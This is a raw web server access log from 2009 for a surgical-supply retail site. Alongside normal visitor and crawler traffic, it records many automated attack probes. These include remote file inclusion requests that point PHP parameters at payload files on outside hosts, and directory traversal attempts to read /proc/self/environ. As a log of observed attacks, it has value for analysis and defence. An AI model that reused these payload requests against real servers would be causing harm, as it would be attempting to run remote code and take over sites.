74.6.8.113 - - [22/Oct/2009:01:31:00 -0400] "GET /logs/access_log.Q109073000 HTTP/1.0" 200 4555164 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
68.127.103.84 - - [22/Oct/2009:01:31:31 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
97.90.5.110 - - [22/Oct/2009:01:31:39 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://us.mc581.mail.yahoo.com/mc/welcome?.gx=0&.tm=1256189250&.rand=30iceqkgk2c77" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:32:01 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:32:01 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:32:04 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:32:04 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
58.230.118.81 - - [22/Oct/2009:01:32:38 -0400] "GET /logs/access_log.Q109091100///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:32:38 -0400] "GET /logs/access_log.Q109083100///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
97.90.5.110 - - [22/Oct/2009:01:33:20 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01 HTTP/1.1" 200 54812 "http://www.acesurgical.com/expand_chisel.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:21 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:21 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:21 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:21 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:21 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:22 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:22 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:22 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:22 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:22 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:22 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:22 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:22 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:37 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:37 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:37 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:37 -0400] "GET /images/items/4544700_THUMB.JPG HTTP/1.1" 200 3000 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:38 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:38 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:38 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:38 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:38 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:38 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:38 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:38 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:38 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:38 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:33:38 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
221.170.181.17 - - [22/Oct/2009:01:33:51 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
221.170.181.17 - - [22/Oct/2009:01:33:51 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
221.170.181.17 - - [22/Oct/2009:01:33:54 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
221.170.181.17 - - [22/Oct/2009:01:33:54 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.230.118.81 - - [22/Oct/2009:01:33:59 -0400] "GET /logs/access_log.Q109083100///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:33:59 -0400] "GET /logs/access_log.Q109091100///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Oct/2009:01:34:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.230.118.81 - - [22/Oct/2009:01:34:20 -0400] "GET /logs/access_log.Q109083100///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:34:37 -0400] "GET /logs/access_log.Q109091100///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
97.90.5.110 - - [22/Oct/2009:01:34:40 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:34:40 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
58.230.118.81 - - [22/Oct/2009:01:34:44 -0400] "GET /logs/access_log.Q109083100///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:34:44 -0400] "GET /logs/access_log.Q109091100///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
97.90.5.110 - - [22/Oct/2009:01:34:46 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
97.90.5.110 - - [22/Oct/2009:01:34:46 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322)"
66.249.71.51 - - [22/Oct/2009:01:34:56 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1143704F5A59E5007699093+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
58.230.118.81 - - [22/Oct/2009:01:35:51 -0400] "GET /logs/access_log.Q109083100///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:35:51 -0400] "GET /logs/access_log.Q109091100///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:36:23 -0400] "GET /logs/access_log.Q109083100///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:36:23 -0400] "GET /logs/access_log.Q109091100///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.142.214.162 - - [22/Oct/2009:01:37:33 -0400] "GET //avatar.php?page=./../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "-"
91.142.214.162 - - [22/Oct/2009:01:37:35 -0400] "GET //avatar.php?page=./../../../../../../../../proc/self/environ HTTP/1.1" 404 209 "-" "-"
82.193.15.3 - - [22/Oct/2009:01:38:11 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:38:12 -0400] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:38:12 -0400] "GET /logs/access_log.Q109070400//components/com_virtuemart/export.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Oct/2009:01:39:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.193.15.3 - - [22/Oct/2009:01:39:12 -0400] "GET /logs/access_log.Q109081900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:40:30 -0400] "GET /logs/error_log.Q109070400//components/com_virtuemart/export.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.140.23.192 - - [22/Oct/2009:01:41:46 -0400] "GET /logs/error_log.Q109091200//setup.php?dir=http://fmmkor.org/zboard/data/mission/2.swf? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
62.140.23.192 - - [22/Oct/2009:01:41:46 -0400] "GET /logs//setup.php?dir=http://fmmkor.org/zboard/data/mission/2.swf? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
62.140.23.192 - - [22/Oct/2009:01:41:48 -0400] "GET //setup.php?dir=http://fmmkor.org/zboard/data/mission/2.swf? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
94.102.6.154 - - [22/Oct/2009:01:42:02 -0400] "GET //?path%5Bdocroot%5D=http://beauty2009.poya.com.tw/upimgs/idxx.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.102.6.154 - - [22/Oct/2009:01:42:25 -0400] "GET /logs//?path%5Bdocroot%5D=http://beauty2009.poya.com.tw/upimgs/idxx.txt??? HTTP/1.1" 200 22863 "-" "Mozilla/5.0"
210.55.15.155 - - [22/Oct/2009:01:42:27 -0400] "GET /logs/access_log.Q109082800%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
210.55.15.155 - - [22/Oct/2009:01:42:27 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
210.55.15.155 - - [22/Oct/2009:01:42:27 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
94.102.6.154 - - [22/Oct/2009:01:43:09 -0400] "GET //?path%5Bdocroot%5D=http://beauty2009.poya.com.tw/upimgs/idxx.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.102.6.154 - - [22/Oct/2009:01:43:09 -0400] "GET /logs//?path%5Bdocroot%5D=http://beauty2009.poya.com.tw/upimgs/idxx.txt??? HTTP/1.1" 200 22863 "-" "Mozilla/5.0"
94.102.6.154 - - [22/Oct/2009:01:43:29 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://beauty2009.poya.com.tw/upimgs/idxx.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
210.55.15.155 - - [22/Oct/2009:01:43:43 -0400] "GET /logs/access_log.Q109081900%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
62.182.62.35 - - [22/Oct/2009:01:44:07 -0400] "GET /mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
62.182.62.35 - - [22/Oct/2009:01:44:07 -0400] "GET /logs/access_log.Q109071200/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
62.182.62.35 - - [22/Oct/2009:01:44:08 -0400] "GET /logs/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
209.59.12.99 - - [22/Oct/2009:01:44:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.140.23.192 - - [22/Oct/2009:01:44:17 -0400] "GET /logs/error_log.Q109091200//setup.php?dir=http://fmmkor.org/zboard/data/mission/2.swf? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
62.140.23.192 - - [22/Oct/2009:01:44:17 -0400] "GET //setup.php?dir=http://fmmkor.org/zboard/data/mission/2.swf? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
62.140.23.192 - - [22/Oct/2009:01:44:18 -0400] "GET /logs//setup.php?dir=http://fmmkor.org/zboard/data/mission/2.swf? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
62.140.23.192 - - [22/Oct/2009:01:44:36 -0400] "GET /logs/access_log.Q109091200//setup.php?dir=http://fmmkor.org/zboard/data/mission/2.swf? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
67.23.42.167 - - [22/Oct/2009:01:44:47 -0400] "GET /xmlrpc.php HTTP/1.1" 404 208 "-" "BOV"
69.110.67.142 - - [22/Oct/2009:01:44:55 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://us.mc324.mail.yahoo.com/mc/welcome?.gx=1&.tm=1256188696&.rand=5jg7psrcv1s87" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
62.140.23.192 - - [22/Oct/2009:01:45:09 -0400] "GET //skin/ggambo7002_board/comment_modify.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
62.140.23.192 - - [22/Oct/2009:01:45:09 -0400] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
62.140.23.192 - - [22/Oct/2009:01:45:14 -0400] "GET /logs/access_log.Q109072500//skin/ggambo7002_board/comment_modify.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
128.121.21.48 - - [22/Oct/2009:01:45:16 -0400] "GET /logs/skin/rosun2005P_shop_s3/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
128.121.21.48 - - [22/Oct/2009:01:45:18 -0400] "GET /skin/rosun2005P_shop_s3/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
62.140.23.192 - - [22/Oct/2009:01:45:33 -0400] "GET /logs/access_log.Q109072200//skin/ggambo7002_board/comment_modify.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
